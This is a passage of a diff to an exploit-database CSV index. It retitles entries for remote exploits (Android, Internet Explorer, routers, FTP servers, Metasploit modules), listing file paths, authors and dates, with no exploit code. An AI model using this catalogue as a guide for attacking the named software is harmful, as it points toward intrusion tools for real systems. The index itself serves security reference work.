Animated Cursor '.ani' Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0 -3654,platforms/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution Exploit",2007-04-03,"Isma Khan",multiple,remote,0 +3654,platforms/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution",2007-04-03,"Isma Khan",multiple,remote,0 3661,platforms/windows/remote/3661.pl,"HP Mercury Quality Center - Spider90.ocx ProgColor Overflow",2007-04-04,ri0t,windows,remote,0 3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0 3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21 @@ -9838,7 +9840,7 @@ id,file,description,date,author,platform,type,port 7910,platforms/windows/remote/7910.html,"WOW Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0 7912,platforms/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - Clickjacking",2009-01-29,UzmiX,windows,remote,0 7913,platforms/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow",2009-01-29,SkD,windows,remote,21 -7915,platforms/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-01-29,"Usman Saeed",hardware,remote,0 +7915,platforms/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 - File Disclosure / Cross-Site Scripting",2009-01-29,"Usman Saeed",hardware,remote,0 7918,platforms/windows/remote/7918.txt,"ManageEngine Firewall Analyzer 5 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",windows,remote,0 7919,platforms/windows/remote/7919.txt,"Profense Web Application Firewall 2.6.2 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",windows,remote,0 7920,platforms/hardware/remote/7920.txt,"D-Link VoIP Phone Adapter - Cross-Site Scripting / Cross-Site Request Forgery Remote Firmware Overwrite",2009-01-29,"Michael Brooks",hardware,remote,0 @@ -9846,7 +9848,7 @@ id,file,description,date,author,platform,type,port 7926,platforms/windows/remote/7926.pl,"Amaya Web Editor 11 - Remote Overwrite (SEH)",2009-01-30,LiquidWorm,windows,remote,0 7928,platforms/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null Byte File Overwrite",2009-01-30,DSecRG,windows,remote,0 7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 - (ChromeHTML://) Parameter Injection (PoC)",2009-01-30,waraxe,windows,remote,0 -7966,platforms/windows/remote/7966.txt,"navicopa WebServer 3.0.1 - (Buffer Overflow / Script Source Disclosure) Multiple Vulnerabilities",2009-02-03,e.wiZz!,windows,remote,0 +7966,platforms/windows/remote/7966.txt,"navicopa WebServer 3.0.1 - Buffer Overflow / Script Source Disclosure",2009-02-03,e.wiZz!,windows,remote,0 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows XP)",2009-02-04,"Rob Carter",windows,remote,0 7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows Vista)",2009-02-04,"Rob Carter",windows,remote,0 8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,hardware,remote,0 @@ -9909,7 +9911,7 @@ id,file,description,date,author,platform,type,port 8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Directory Traversal",2009-04-16,e.wiZz!,windows,remote,0 8518,platforms/windows/remote/8518.pl,"Femitter FTP Server 1.03 - Arbitrary File Disclosure",2009-04-22,Stack,windows,remote,0 8525,platforms/windows/remote/8525.pl,"BolinTech DreamFTP Server 1.02 - 'users.dat' Arbitrary File Disclosure",2009-04-23,Cyber-Zone,windows,remote,0 -8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 - (Directory Traversal/File Disclosure) Multiple Vulnerabilities",2009-04-27,"Alfons Luja",windows,remote,0 +8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 - Directory Traversal / File Disclosure",2009-04-27,"Alfons Luja",windows,remote,0 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus - HTTP Server Remote Buffer Overflow",2009-04-27,His0k4,windows,remote,80 8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 8560,platforms/windows/remote/8560.html,"Autodesk IDrop - ActiveX Remote Code Execution",2009-04-28,Elazar,windows,remote,0 @@ -9962,7 +9964,7 @@ id,file,description,date,author,platform,type,port 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0 9093,platforms/windows/remote/9093.txt,"Microsoft Windows live messenger plus! fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0 9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 - JSP Source Viewing",2009-07-09,kingcope,windows,remote,0 -9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - (Cross-Site Scripting / SQL Injection / Remote Code Execution) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0 +9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution",2009-07-10,"Secure Network",windows,remote,0 9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video - ActiveX Remote Buffer Overflow",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 9117,platforms/hardware/remote/9117.txt,"HTC / Windows Mobile OBEX FTP Service - Directory Traversal",2009-07-10,"Alberto Tablado",hardware,remote,0 9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - 'Response' Remote Buffer Overflow (SEH)",2009-07-12,His0k4,windows,remote,0 @@ -10150,8 +10152,8 @@ id,file,description,date,author,platform,type,port 11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - (daap) Buffer Overflow Remote Exploit",2010-01-14,Simo36,windows,remote,0 11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 11167,platforms/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0 -11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec (PoC)",2010-01-17,superli,windows,remote,0 -11173,platforms/windows/remote/11173.txt,"Trend Micro Web-Deployment ActiveX - Remote Exec (PoC)",2010-01-17,superli,windows,remote,0 +11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote,0 +11173,platforms/windows/remote/11173.txt,"Trend Micro Web-Deployment ActiveX - Remote Execution (PoC)",2010-01-17,superli,windows,remote,0 11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2 - Buffer Overflow",2010-01-18,"John Babio",windows,remote,0 11203,platforms/multiple/remote/11203.py,"Pidgin MSN 2.6.4 - File Download",2010-01-19,"Mathieu GASPARD",multiple,remote,0 11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray)",2010-01-20,Dz_attacker,windows,remote,0 @@ -10206,8 +10208,8 @@ id,file,description,date,author,platform,type,port 12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0 12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 -12263,platforms/multiple/remote/12263.txt,"Apache OFBiz - SQL Remote Execution PoC Payload",2010-04-16,"Lucas Apa",multiple,remote,0 -12264,platforms/multiple/remote/12264.txt,"Apache OFBiz - FULLADMIN Creator PoC Payload",2010-04-16,"Lucas Apa",multiple,remote,0 +12263,platforms/multiple/remote/12263.txt,"Apache OFBiz - Remote Execution (via SQL Execution) (PoC)",2010-04-16,"Lucas Apa",multiple,remote,0 +12264,platforms/multiple/remote/12264.txt,"Apache OFBiz - Admin Creator (PoC)",2010-04-16,"Lucas Apa",multiple,remote,0 12265,platforms/hardware/remote/12265.txt,"Iomega Home Media Network Hard Drive 2.038 < 2.061 - Unauthenticated File-system Access",2010-04-16,fizix610,hardware,remote,0 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 12304,platforms/multiple/remote/12304.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,multiple,remote,0 @@ -10361,7 +10363,7 @@ id,file,description,date,author,platform,type,port 15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0 15373,platforms/windows/remote/15373.txt,"mongoose Web server 2.11 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0 15421,platforms/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,windows,remote,0 -15423,platforms/android/remote/15423.html,"Android 2.0 < 2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 +15423,platforms/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0 15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0 15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",windows,remote,0 @@ -10369,7 +10371,7 @@ id,file,description,date,author,platform,type,port 15449,platforms/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Command Execution",2010-11-07,kingcope,linux,remote,0 15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21 15505,platforms/hardware/remote/15505.txt,"Camtron CMNC-200 IP Camera - Directory Traversal",2010-11-13,"Trustwave's SpiderLabs",hardware,remote,0 -15548,platforms/android/remote/15548.html,"Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0 +15548,platforms/android/remote/15548.html,"Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0 15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0 15631,platforms/hardware/remote/15631.txt,"HP LaserJet - Directory Traversal in PJL Interface",2010-11-29,"n.runs AG",hardware,remote,0 15648,platforms/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution",2010-12-01,bz1p,windows,remote,0 @@ -10973,7 +10975,7 @@ id,file,description,date,author,platform,type,port 16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 - Command Execution (Metasploit)",2011-03-11,Metasploit,unix,remote,8812 16970,platforms/windows/remote/16970.rb,"Kolibri HTTP Server 2.0 - HEAD Buffer Overflow (Metasploit)",2011-08-03,Metasploit,windows,remote,0 16972,platforms/ios/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,ios,remote,0 -16974,platforms/android/remote/16974.html,"Android 2.0 / 2.1 /2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0 +16974,platforms/android/remote/16974.html,"Google Android 2.0/2.1/2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0 16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution (Metasploit)",2011-03-15,Metasploit,windows,remote,0 16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,multiple,remote,0 16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution (Metasploit)",2011-03-16,Metasploit,multiple,remote,0 @@ -13336,7 +13338,7 @@ id,file,description,date,author,platform,type,port 26075,platforms/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform - Privilege Escalation",2013-06-10,prdelka,hardware,remote,0 26299,platforms/windows/remote/26299.c,"MultiTheftAuto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 26101,platforms/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure Vulnerabilities",2005-08-05,anonymous,linux,remote,0 -40874,platforms/android/remote/40874.txt,"Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap",2016-12-06,"Google Security Research",android,remote,0 +40874,platforms/android/remote/40874.txt,"Google Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap",2016-12-06,"Google Security Research",android,remote,0 26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box - ConnectToSynactic Stack Buffer Overflow (Metasploit)",2013-06-11,Metasploit,windows,remote,0 26135,platforms/multiple/remote/26135.rb,"Java Applet - Driver Manager Privileged toString() Remote Code Execution (Metasploit)",2013-06-11,Metasploit,multiple,remote,0 @@ -13400,7 +13402,7 @@ id,file,description,date,author,platform,type,port 27073,platforms/windows/remote/27073.txt,"Microsoft Visual Studio - UserControl Remote Code Execution (2)",2006-01-12,priestmaster,windows,remote,0 27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - Sample Script cal2.jsp time Parameter Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0 27096,platforms/multiple/remote/27096.txt,"Apache Geronimo 1.0 - Error Page Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0 -27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - 'acsd' Parameter Remote Command Execution",2013-07-27,"Jacob Holcomb",linux_mips,remote,0 +27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - 'acsd' Parameter Remote Command Execution",2013-07-27,"Jacob Holcomb",linux_mips,remote,0 27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)",2013-07-27,Metasploit,multiple,remote,8080 27150,platforms/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting",2006-01-30,"Chris Thomas",linux,remote,0 27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes JavaScript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 @@ -13869,7 +13871,7 @@ id,file,description,date,author,platform,type,port 31076,platforms/linux/remote/31076.py,"MPlayer 1.0rc2 - 'demux_mov.c' Remote Code Execution",2008-02-04,"Felipe Manzano",linux,remote,0 31078,platforms/hardware/remote/31078.txt,"2WIRE Routers - 'H04_POST' Access Validation",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0 31095,platforms/novell/remote/31095.txt,"Novell Groupwise 5.57e/6.5.7/7.0 Webaccess - Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0 -31106,platforms/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - (Buffer Overflow and Authentication Bypass) Multiple Vulnerabilities",2008-02-04,"Luigi Auriemma",multiple,remote,0 +31106,platforms/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - Buffer Overflow / Authentication Bypass",2008-02-04,"Luigi Auriemma",multiple,remote,0 31113,platforms/windows/remote/31113.html,"GlobalLink 2.6.1.2 - 'HanGamePlugincn18.dll' ActiveX Control Multiple Buffer Overflow Vulnerabilities",2008-02-05,anonymous,windows,remote,0 31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 - File Converter Field Length Remote Code Execution",2008-02-06,"Luigi Auriemma",windows,remote,0 31119,platforms/multiple/remote/31119.txt,"TinTin++ / WinTin++ 1.97.9 - '#chat' Command Multiple Vulnerabilities",2008-02-06,"Luigi Auriemma",multiple,remote,0 @@ -13915,7 +13917,7 @@ id,file,description,date,author,platform,type,port 31473,platforms/osx/remote/31473.html,"Apple Safari 3.1 - Window.setTimeout Variant Content Spoofing",2008-03-22,"Juan Pablo Lopez Yacubian",osx,remote,0 31474,platforms/windows/remote/31474.py,"Mitsubishi Electric GB-50A - Multiple Remote Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",windows,remote,0 31479,platforms/php/remote/31479.txt,"Quick Classifieds 1.0 - index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,remote,0 -40354,platforms/android/remote/40354.txt,"Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow",2016-09-08,"Google Security Research",android,remote,0 +40354,platforms/android/remote/40354.txt,"Google Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow",2016-09-08,"Google Security Research",android,remote,0 31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution (Metasploit)",2014-02-07,Metasploit,linux,remote,8023 31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,hardware,remote,0 31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Unspecified",2008-03-25,"Nicholas Gregorie",novell,remote,0 @@ -14167,7 +14169,7 @@ id,file,description,date,author,platform,type,port 33064,platforms/multiple/remote/33064.txt,"Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,multiple,remote,0 33066,platforms/windows/remote/33066.html,"Avax Vector 1.3 - 'avPreview.ocx' ActiveX Control Buffer Overflow",2009-06-06,Satan_HackerS,windows,remote,0 33067,platforms/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",multiple,remote,0 -33071,platforms/windows/remote/33071.txt,"McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - (ePowner) Multiple Vulnerabilities",2014-04-28,st3n,windows,remote,0 +33071,platforms/windows/remote/33071.txt,"McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - 'ePowner' Multiple Vulnerabilities",2014-04-28,st3n,windows,remote,0 33078,platforms/multiple/remote/33078.txt,"HP ProCurve Threat Management Services - zl ST.1.0.090213 Module CRL Security Bypass",2009-06-13,anonymous,multiple,remote,0 33079,platforms/multiple/remote/33079.txt,"Oracle Weblogic Server 10.3 - 'console-help.portal' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 33081,platforms/multiple/remote/33081.cpp,"Oracle 9i/10g Database - Remote Network Authentication",2009-06-14,"Dennis Yurichev",multiple,remote,0 @@ -14393,7 +14395,7 @@ id,file,description,date,author,platform,type,port 34426,platforms/linux/remote/34426.txt,"uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection",2010-08-05,Chuzz,linux,remote,0 34431,platforms/linux/remote/34431.html,"Nagios XI - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0 34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision",2010-08-11,"Florian Zumbiehl",windows,remote,0 -34439,platforms/multiple/remote/34439.txt,"ServletExec - (Directory Traversal / Authentication Bypass) Multiple Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0 +34439,platforms/multiple/remote/34439.txt,"ServletExec - Directory Traversal / Authentication Bypass",2010-08-12,"Stefano Di Paola",multiple,remote,0 34448,platforms/multiple/remote/34448.rb,"Mozilla Firefox - WebIDL Privileged JavaScript Injection (Metasploit)",2014-08-28,Metasploit,multiple,remote,0 34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",multiple,remote,0 34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",windows,remote,0 @@ -14847,7 +14849,7 @@ id,file,description,date,author,platform,type,port 38100,platforms/hardware/remote/38100.txt,"Multiple Fortinet FortiWeb Appliances - Multiple Cross-Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0 38096,platforms/linux/remote/38096.rb,"Endian Firewall - Password Change Command Injection (Metasploit)",2015-09-07,Metasploit,linux,remote,10443 38109,platforms/linux/remote/38109.pl,"Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass",2012-12-06,kingcope,linux,remote,0 -38124,platforms/android/remote/38124.py,"Android - 'Stagefright' Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0 +38124,platforms/android/remote/38124.py,"Google Android - 'Stagefright' Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0 38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console - Directory Traversal",2013-01-09,"Dhruv Shah",linux,remote,0 38151,platforms/windows/remote/38151.py,"Microsoft Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0 38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default - WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0 @@ -14858,7 +14860,7 @@ id,file,description,date,author,platform,type,port 38196,platforms/php/remote/38196.rb,"CMS Bolt - Arbitrary File Upload (Metasploit)",2015-09-15,Metasploit,php,remote,80 38206,platforms/windows/remote/38206.html,"Samsung Kies - Remote Buffer Overflow",2013-01-09,"High-Tech Bridge",windows,remote,0 38221,platforms/java/remote/38221.rb,"ManageEngine OpManager - Remote Code Execution (Metasploit)",2015-09-17,Metasploit,java,remote,0 -38226,platforms/android/remote/38226.py,"Android - libstagefright Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote,0 +38226,platforms/android/remote/38226.py,"Google Android - libstagefright Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote,0 38227,platforms/windows/remote/38227.txt,"Microsoft Lync 2010 4.0.7577.0 - User-Agent Header Handling Arbitrary Command Execution",2013-01-11,"Christopher Emerson",windows,remote,0 38230,platforms/multiple/remote/38230.txt,"Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities",2013-01-18,"Juan Caillava",multiple,remote,0 38233,platforms/hardware/remote/38233.txt,"F5 Networks BIG-IP - XML External Entity Injection",2013-01-21,anonymous,hardware,remote,0 @@ -14870,7 +14872,7 @@ id,file,description,date,author,platform,type,port 38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21 38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution (Metasploit)",2015-09-23,Metasploit,multiple,remote,6667 38308,platforms/hardware/remote/38308.txt,"TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0 -38310,platforms/android/remote/38310.c,"Android 2.3.5 - PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote,0 +38310,platforms/android/remote/38310.c,"Google Android 2.3.5 - PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote,0 38313,platforms/multiple/remote/38313.html,"Dell SonicWALL Scrutinizer - Multiple HTML Injection Vulnerabilities",2013-02-14,"Benjamin Kunz Mejri",multiple,remote,0 38325,platforms/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin - Cross-Site Request Forgery",2013-02-18,QSecure,windows,remote,0 38330,platforms/windows/remote/38330.txt,"Photodex ProShow Producer - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",windows,remote,0 @@ -15030,7 +15032,7 @@ id,file,description,date,author,platform,type,port 39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers - Information Disclosure",2014-09-15,"Eric Fajardo",hardware,remote,0 39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers - Session Hijacking",2014-09-15,"Eric Fajardo",hardware,remote,0 39318,platforms/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Function Password Truncation Security",2014-09-16,"Pichaya Morimoto",multiple,remote,0 -39328,platforms/android/remote/39328.rb,"Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,android,remote,5555 +39328,platforms/android/remote/39328.rb,"Google Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,android,remote,5555 39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L - Authenticated Remote Command Execution (Metasploit)",2016-02-10,Metasploit,hardware,remote,0 39439,platforms/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0 39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,linux,remote,0 @@ -15046,7 +15048,7 @@ id,file,description,date,author,platform,type,port 39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0 39632,platforms/linux/remote/39632.py,"LShell 0.9.15 - Remote Code Execution",2012-12-30,drone,linux,remote,0 39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 - Directory Traversal / Remote Code Execution (Metasploit)",2016-03-30,Metasploit,php,remote,80 -39640,platforms/android/remote/39640.txt,"Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)",2016-03-30,NorthBit,android,remote,0 +39640,platforms/android/remote/39640.txt,"Google Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)",2016-03-30,NorthBit,android,remote,0 39643,platforms/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload (Metasploit)",2016-03-31,Metasploit,java,remote,8080 39645,platforms/multiple/remote/39645.php,"PHP 5.5.33 / 7.0.4 - SNMP Format String",2016-04-01,"Andrew Kramer",multiple,remote,0 39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 - Arbitrary File Upload (Metasploit)",2016-04-13,Metasploit,unix,remote,0 @@ -15085,7 +15087,7 @@ id,file,description,date,author,platform,type,port 40113,platforms/linux/remote/40113.txt,"OpenSSHd 7.2p2 - Username Enumeration (PoC)",2016-07-18,"Eddie Harari",linux,remote,22 40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0 -40846,platforms/android/remote/40846.html,"Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",android,remote,0 +40846,platforms/android/remote/40846.html,"Google Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",android,remote,0 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0 40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80 40136,platforms/linux/remote/40136.py,"OpenSSHd 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22 @@ -15110,7 +15112,7 @@ id,file,description,date,author,platform,type,port 40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161 40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Exploit",2016-08-19,"Shadow Brokers",hardware,remote,0 40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80 -40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0 +40436,platforms/android/remote/40436.rb,"Google Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0 40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0 40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow",2016-10-03,Tulpa,windows,remote,80 40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 @@ -15179,6 +15181,7 @@ id,file,description,date,author,platform,type,port 40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security 